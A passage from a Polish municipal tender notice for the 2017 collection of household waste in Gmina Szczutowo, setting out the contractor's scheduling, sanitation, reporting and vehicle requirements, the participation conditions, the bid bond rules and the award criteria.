4.3.7. Wykonawca zobowiązany jest do opracowania harmonogramu odbierania odpadów od właścicieli  nieruchomości  zamieszkałych na cały okres objęty niniejszym zamówieniem. Harmonogram winien być opracowany we   współpracy z  Zamawiającym    i   podlega  jego  akceptacji.
Zamawiający i Wykonawca wspólnie odpowiadają za informowanie mieszkańców o zasadach i terminach odbierania poszczególnych rodzajów odpadów. W tym celu  po  sporządzeniu  i zaakceptowaniu  harmonogramu  odbioru odpadów,  Zamawiający będzie  publikował  go na stronie internetowej www.szczutowo.nowybip.pl , a Wykonawca w formie wydruków zobowiązany jest przekazać go właścicielom nieruchomości. Przy czym    pierwszy harmonogram  winien być dostarczony właścicielom nieruchomości do dnia 01.01.2017 r., a następne  podczas  odbioru odpadów  lecz nie później niż na 7 dni przed terminem obowiązywania zmienionego harmonogramu.
4.3.8.	Pierwszy harmonogram Wykonawca  sporządza  w terminie do 27 grudnia 2016r. Harmonogram  winien spełniać następujące  warunki:
             a) musi uwzględniać podział na odpady zmieszane i segregowane oraz częstotliwość odbioru  
                  wynikającą z Tabeli 4;
b)	powinien być sformułowany w sposób przejrzysty i łatwy do zinterpretowania przez  wszystkich zainteresowanych;
c) powinien zapewniać regularność i powtarzalność odbierania odpadów poszczególnych rodzajów (np. dla danej nieruchomości każdy 1 wtorek miesiąca dla odpadów zmieszanych), by mieszkańcy mogli w łatwy sposób zaplanować przygotowanie odpadów do odebrania.
W związku z faktem iż właściciele  nieruchomości  zamieszkałych nabrali przyzwyczajenia  Zamawiający wymaga, aby harmonogram odbioru odpadów był identyczny bądź maksymalnie zbliżony  do harmonogramu obowiązującego w okresie od 01 stycznia 2016 do 31 grudnia 2016 r. 
4.3.9. Wykonawca zobowiązuje się udostępnić w formie sprzedaży lub najmu wszystkim  zainteresowanym   właścicielom  nieruchomości  zamieszkałych pojemniki  do gromadzenia odpadów zmieszanych. 
            Uwaga !  Usługa ta  nie wchodzi  w zakres przedmiotu zamówienia i  będzie realizowana na  zlecenie i koszt  właścicieli  nieruchomości. Wybór formy udostępnienia  dokonuje  właściciel nieruchomości.
        Usługa ta  winna  być zrealizowana   w takim terminie,  aby  do  dnia 01.01.2017 r.  wszystkie nieruchomości, których właściciele wyrażą taką  wolę,  zostały  wyposażone w pojemnik na odpady zmieszane.
            Ponadto  usługa winna  być   dostępna  przez  cały okres   trwania umowy.

4.4. Standard sanitarny wykonywania usług oraz ochrony środowiska
4.4.1. 	Wykonawca jest zobowiązany do odbierania odpadów w sposób zapewniający utrzymanie odpowiedniego standardu sanitarnego, w szczególności do:
a)	odbioru poszczególnych rodzajów odpadów, w terminach wynikających z ustalonego harmonogramu;
b)	natychmiastowego uporządkowania terenu zanieczyszczonego odpadami i innymi zanieczyszczeniami wysypanymi z pojemników, kontenerów i pojazdów w trakcie realizacji usługi;
c) zachowania właściwego stanu sanitarnego użytkowanych pojazdów, a także własnych pojemników i kontenerów służących do gromadzenia odpadów, przy czym mycie  i dezynfekcja sprzętu winny odbywać się w warunkach spełniających wymagania z zakresu ochrony środowiska i ochrony sanitarnej, Wykonawca  zobowiązany jest posiadać  aktualne  dokumenty        potwierdzające wykonanie ww. czynności;
d)	realizacji usług przy wykorzystaniu sprzętu sprawnego technicznie, nie powodującego wycieków olejów, smarów itp., zabezpieczonego przed niekontrolowanym wydostawaniem się na zewnątrz odpadów, podczas ich magazynowania, przeładunku i transportu; 
e)	na koniec każdego dnia roboczego pojazdy winny być opróżnione z odpadów i parkowane wyłącznie na terenie bazy magazynowo-transportowej.                                                  
4.4.2. 	Wykonawca zobowiązany jest do spełnienia wymagań określonych w Rozporządzeniu Ministra  Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz.U. z 2013 r., poz. 122).
4.4.3. 	Wykonawcę obowiązuje zakaz mieszania selektywnie zebranych odpadów komunalnych ze zmieszanymi odpadami komunalnymi odbieranymi od właścicieli nieruchomości oraz zakaz mieszania ze sobą poszczególnych frakcji selektywnie zebranych odpadów komunalnych.

4.5. Obowiązek prowadzenia dokumentacji związanej z działalnością objętą zamówieniem
4.5.1. 	Wykonawca jest obowiązany do przekazywania Zamawiającemu miesięcznych raportów, stanowiących podstawę do wystawienia faktury za wykonaną usługę, zawierających odpowiednio, następujące informacje:
a) 	ilość [Mg] odebranych poszczególnych rodzajów odpadów tj. odpadów zmieszanych, szkła, papieru, tektury i opakowań wielomateriałowych, tworzyw sztucznych i metali, mebli i innych odpadów wielkogabarytowych, odpadów niebezpiecznych, przeterminowanych leków oraz innych niż niebezpieczne odpadów budowlanych i rozbiórkowych, odpadów zielonych; 
b) 	sposoby zagospodarowania ww. odpadów wraz ze wskazaniem podmiotów, którym zostały przekazane  wraz z kartami przekazania  odpadu
c) wykaz nieruchomości, z których w danym miesiącu zostały odebrane odpady komunalne, z podaniem nazwy miejscowości, ulicy i numeru budynku.
	d)  do ostatniej faktury Wykonawca dołączy wyliczenie poziomu recyklingu w oparciu o dane 		    zawarte w raportach załączanych do faktur składanych od stycznia do grudnia z zastosowaniem 	     wzoru z Rozporządzenia Ministra Środowiska z dnia 29 maja 2012r, w sprawie poziomów 		    recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji 	    odpadów komunalnych (Dz.U. z 2012r. poz. 645 z późn.zm.) § 3 do obliczenia łącznej masy     
                 wytworzonych odpadów papieru, metalu, tworzyw sztucznych i szkła, pochodzących ze      
                 struminienia odpadów komunalnych z gospodarstw domowych oraz innych wytwórców odpadów   
                 komunalnych, wyrażona w Mg stosowanego przez Gminy.
4.5.2. 	Wykonawca jest zobowiązany do niezwłocznego przekazywania Zamawiającemu informacji o niezgodnym z Regulaminem utrzymania czystości i porządku na terenie Gminy Szczutowo zbieraniu odpadów przez właścicieli nieruchomości, w szczególności ich mieszaniu lub przygotowywaniu do odbierania w niewłaściwych pojemnikach. Informacja powinna zawierać w szczególności:
a) 	adres nieruchomości, na której odpady zbierane są w sposób niezgodny z regulaminem,
b)	zdjęcia w postaci cyfrowej, potwierdzające niezgodne z regulaminem zbieranie odpadów, pozwalające w sposób nie budzący wątpliwości na przypisanie pojemników lub worków do konkretnej nieruchomości,
c)	protokół sporządzony przez pracowników Wykonawcy, którzy stwierdzili fakt niezgodnego z regulaminem postępowania z odpadami.
4.5.3.	Informacje, o których mowa w pkt 4.5.1 i 4.5.2 Wykonawca przekazuje w formie pisemnej.             
4.5.4.	Wykonawca jest zobowiązany do przedstawienia niezwłocznie, na żądanie Zamawiającego, poświadczonych kopii dokumentów sporządzanych na potrzeby  ewidencji odpadów, tj. kart ewidencji odpadów, kart przekazania odpadów do RIPOK lub do instalacji odzysku i unieszkodliwiania, w celu potwierdzenia prawidłowo prowadzonej gospodarki odpadami komunalnymi.
4.5.5.	Wykonawca jest  zobowiązany do  przekazywania Zamawiającemu  sprawozdań w zakresie objętym przedmiotem zamówienia, spełniające wymogi Rozporządzenia Ministra Środowiska z dnia 17 czerwca 2016 r. w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz.U. z 2016 r. poz.934 z późn. zm.).
4.5.6. Dane pochodzące z systemu monitoringu i sytemu czujników, o których mowa w pkt 4.6.2 pkt 2d powinny być przechowywane w siedzibie podmiotu odbierającego odpady komunalne od właścicieli nieruchomości, przez cały okres realizacji zamówienia. Wykonawca powinien posiadać odpowiedni program umożliwiający odczyt, prezentację oraz weryfikację przechowywanych danych. Dane powinny być udostępniane na każde żądanie Zamawiającego.

4.6. Szczegółowe wymagania stawiane przedsiębiorcom odbierającym odpady komunalne od właścicieli nieruchomości
4.6.1. 	Wymagania formalne
1) Wykonawca obowiązany jest w dniu podpisania umowy do przedłożenia następujących dokumentów:

a)	umowę/y  z regionalną instalacją do przetwarzania odpadów komunalnych wskazaną w Planie gospodarki odpadami dla województwa mazowieckiego   na  zagospodarowanie  zmieszanych odpadów komunalnych oraz odpadów zielonych 
b)	umowy z instalacjami odzysku i unieszkodliwiania lub zezwolenia na przetwarzanie odpadów, w zakresie objętym przedmiotem zamówienia.  
  
4.6.2	Wymagania dotyczące posiadanych przez Wykonawcę pojazdów i urządzeń oraz bazy magazynowo-transportowej     
1) Wykonawca   jest   obowiązany  posiadać   bazę   magazynowo-transportową,   usytuowaną w  odległości nie większej niż 60 km od granicy Gminy Szczutowo, na terenie, do którego posiada tytuł prawny, spełniającą wymagania określone w Rozporządzeniu Ministra  Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości.
2) W zakresie posiadania wyposażenia umożliwiającego odbieranie odpadów komunalnych od właścicieli nieruchomości oraz jego odpowiedniego stanu technicznego należy zapewnić, aby:
a) w posiadaniu Wykonawcy znajdowały się co najmniej dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych oraz co najmniej dwa pojazdy przystosowane do odbierania selektywnie zebranych odpadów komunalnych, a także co najmniej jeden pojazd do odbierania odpadów bez funkcji kompaktującej;
b) pojazdy do odbierania odpadów były w pełni sprawne, posiadały aktualne badania techniczne, były dopuszczone do ruchu; 
c) pojazdy były trwale i czytelnie oznakowane, w widocznym miejscu, nazwą firmy oraz danymi adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne od właścicieli nieruchomości;
d) wszystkie pojazdy wykorzystywane do realizacji przedmiotu zamówienia były wyposażone w urządzenia monitorujące, bazujące na systemie pozycjonowania satelitarnego, umożliwiające trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postojów oraz czujniki zapisujące dane o miejscach wyładunku odpadów  umożliwiające weryfikację tych danych, 
e) w przypadku awarii pojazdu Wykonawca zobowiązany jest zapewnić pojazd zastępczy o zbliżonych parametrach.
4.6.3. 	Wykonawca obowiązany jest do spełniania wymagań opisanych w pkt 4.6.1 i 4.6.2 przez cały okres realizacji zamówienia.
4.6.4.  	Do obowiązków Wykonawcy należy ponadto:
a) 	dokonywanie odbioru i transportu odpadów, również w przypadkach, kiedy dojazd do punktów zbiórki odpadów komunalnych będzie utrudniony z powodu warunków atmosferycznych  lub prowadzonych remontów dróg, dojazdów itp.,. W takich przypadkach Wykonawcy nie przysługują roszczenia z tytułu wzrostu kosztów realizacji przedmiotu umowy;
b)	okazanie na żądanie Zamawiającego wszelkich dokumentów, potwierdzających wykonywanie przedmiotu umowy, zgodnie z określonymi przez Zamawiającego wymaganiami i przepisami prawa;
c) ponoszenie odpowiedzialności wobec Zamawiającego i osób trzecich, za szkody na mieniu i zdrowiu osób trzecich, powstałe podczas i w związku z realizacją przedmiotu umowy, w zakresie określonym w Kodeksie cywilnym i innych ustawach.

UWAGA!
Zamawiający stosownie do art. 29 ust. 3a ustawy, wymaga zatrudnienia przez Wykonawcę lub
podwykonawcę na podstawie umowy o pracę osób wykonujących następujące czynności w zakresie
realizacji zamówienia, których wykonanie polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r.  Kodeks pracy (Dz.U. 2016, poz.1666 z późn. zm.) (kierowców pojazdów dokonujących odbioru odpadów, którzy będą świadczyć usługi na terenie gminy Szczutowo w wymiarze czasu pracy min. 0,5 etatu) 
Uprawnienia Zamawiającego w zakresie kontroli spełniania przez Wykonawcę wymagań, o których mowa w art. 29 ust. 3a ustawy Prawo zamówień publicznych, oraz sankcji z tytułu niespełnienia tych wymagań zawarte zostały we wzorze umowy § 4 ust. 2 pkt 6 i § 10 ust. 4 pkt 4 i 5<br /><br /><b>II.5) Główny kod CPV: </b>90511000-2<br /><b> Dodatkowe kody CPV:</b>90513100-7<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 01/01/2017
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                a) Wykonawca posiada wpis do rejestru działalności regulowanej, zgodnie z art. 9c ustawy
    o utrzymaniu czystości i porządku w gminach
b) Wykonawca posiada zezwolenie na transport odpadów wydane na podstawie ustawy z dnia 14 grudnia 2012 r. o odpadach lub posiada zezwolenie na odzysk i unieszkodliwianie odpadów we wskazanym zakresie i na podstawie rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 23 grudnia 2003 r. w sprawie rodzajów odpadów, których zbieranie lub transport nie wymagają zezwolenia na prowadzenie działalności (Dz.U. z 2004 r. Nr 16, poz. 154 ze zm.) jest zwolniony z obowiązku uzyskania zezwolenia na transport odpadów
c)  Wykonawca 	posiada uprawnienia do wykonywania działalności w zakresie posiadania zezwolenia na transport odpadów  wydanymi na podstawie ustawy z dnia 14 grudnia 2012 r. o odpadach lub posiadania zezwolenia na odzysk i unieszkodliwianie odpadów we wskazanym zakresie i na podstawie rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 23 grudnia 2003 r. w sprawie rodzajów odpadów, których zbieranie lub transport nie wymagają zezwolenia na prowadzenie działalności (Dz.U. z 2004 r. Nr 16, poz. 154 ze zm.) jest zwolniony z obowiązku uzyskania zezwolenia na transport odpadów;
d) Wykonawca posiada umowę z regionalną instalacją do przetwarzania odpadów komunalnych (RIPOK) wskazaną w WPGO dla Mazowsza<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawca wykaże, iż jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie  mniejszą niż 100.000 PLN<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                 a) Wykonawca przedłoży wykaz usług wykonanych, a w przypadku świadczeń okresowych lub 	ciągłych również wykonywanych w okresie ostatnich 3 	latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie - minimum jednego 	zamówienia w zakresie odbierania i zagospodarowania odpadów komunalnych od właścicieli 	nieruchomości wykonywanych w sposób ciągły przez okres min. 12 miesięcy, wraz z podaniem 	ich 	wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały 	wykonane oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są 	wykonywane należycie, 
 b) Wykonawca wykaże, iż dysponuje co najmniej 2 samochodami przystosowanymi do odbierania zmieszanych odpadów komunalnych;
co  najmniej 2 samochodami przystosowanymi do odbioru selektywnie zebranych odpadów komunalnych;
co najmniej 1 pojazdem do odbierania odpadów komunalnych bez funkcji kompaktującej. Wykonawca musi dysponować bazą magazynowo  transportową usytuowaną na terenie Gminy Szczutowo lub w odległości nie większej niż 60 km od granic tej gminy<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />a) aktualne zaświadczenia o wpisie do rejestru działalności regulowanej,
b) aktualną decyzję o zezwoleniu na transport odpadów,
c) aktualną decyzje o zezwoleniu na odbieranie odpadów,
d) dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie  mniejszą niż 100.000 PLN
e) wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich 3 latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie - minimum jednego zamówienia w zakresie odbierania i zagospodarowania odpadów komunalnych od właścicieli 	nieruchomości wykonywanych w sposób ciągły przez okres min. 12 miesięcy, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie,, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów- oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert 
 załącznik nr 4.
f) wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych tj. Wykonawca dysponuje co najmniej:
co najmniej 2 samochodami przystosowanymi do odbierania zmieszanych odpadów komunalnych;
co  najmniej 2 samochodami przystosowanymi do odbioru selektywnie zebranych odpadów komunalnych;
co najmniej 1 pojazdem do odbierania odpadów komunalnych bez funkcji kompaktującej
Wykonawca musi dysponować bazą magazynowo  transportową usytuowaną na terenie Gminy Szczutowo lub w odległości nie większej niż 60 km od granic tej gminy
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1) Wypełniony i podpisany formularz oferty  załącznik nr 1 do SIWZ
2) Oryginał pełnomocnictwa do reprezentowania Oferenta w postępowaniu o zamówienie publiczne lub do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego.
3) Potwierdzenie wpłaty wadium.
Dokumenty, o których mowa w rozdziale VI niniejszej specyfikacji, należy przedstawić w formie oryginału lub kopii poświadczonych za zgodność z oryginałem przez osobę uprawnioną do reprezentacji Wykonawcy.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1. Wykonawca przystępując do przetargu jest zobowiązany wnieść wadium w wysokości 10.000,00 zł           (dziesięć tysięcy złotych) do upływu terminu składania ofert. Wadium musi obejmować cały okres związania ofertą i może być wniesione w jednej lub kilku następujących formach:
- pieniądzu,
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2016, poz. 359 z późn. zm.) 
2. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego Urząd Gminy Szczutowo , BS Sierpc  12 9015 0001 2001 1300 0101 0001.
3. Oferta jest skutecznie zabezpieczona wadium, jeśli pieniądze znajdują się na koncie Zamawiającego w terminie /godzina/ składania ofert.
Wniesienie wadium w formie innej niż pieniądz poprzez dołączenie dokumentu do oferty jest równoznaczne z wniesieniem wadium przed upływem terminu  składania ofert, pod warunkiem złożenia oferty przed terminem składania ofert. Przy czym  wadium wniesione w formie gwarancji lub poręczenia musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 46 ust. 4a i 5 ustawy Pzp.
4. Zamawiający  zatrzymuje  wadium wraz z odsetkami, jeżeli Wykonawca  w  odpowiedzi  na  wezwanie, o którym mowa w art. 26 ust. 3 i 3a, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów, potwierdzających okoliczności, o których mowa w art. 25 ust.1, oświadczenia, o którym mowa w art. 25a ust. 1, pełnomocnictw, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
5. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana.
Wadium Wykonawcy, który wygra przetarg zostanie zwrócone z chwilą podpisania umowy i wniesienia zabezpieczenia należytego wykonania umowy.
6.  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
          - odmówił podpisania umowy na warunkach określonych w ofercie,
  - nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
 - zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy,
7. Dowód wniesienia wadium w formie innej niż pieniężna należy załączyć do oferty w formie oryginału.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Poziom recyklingu</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
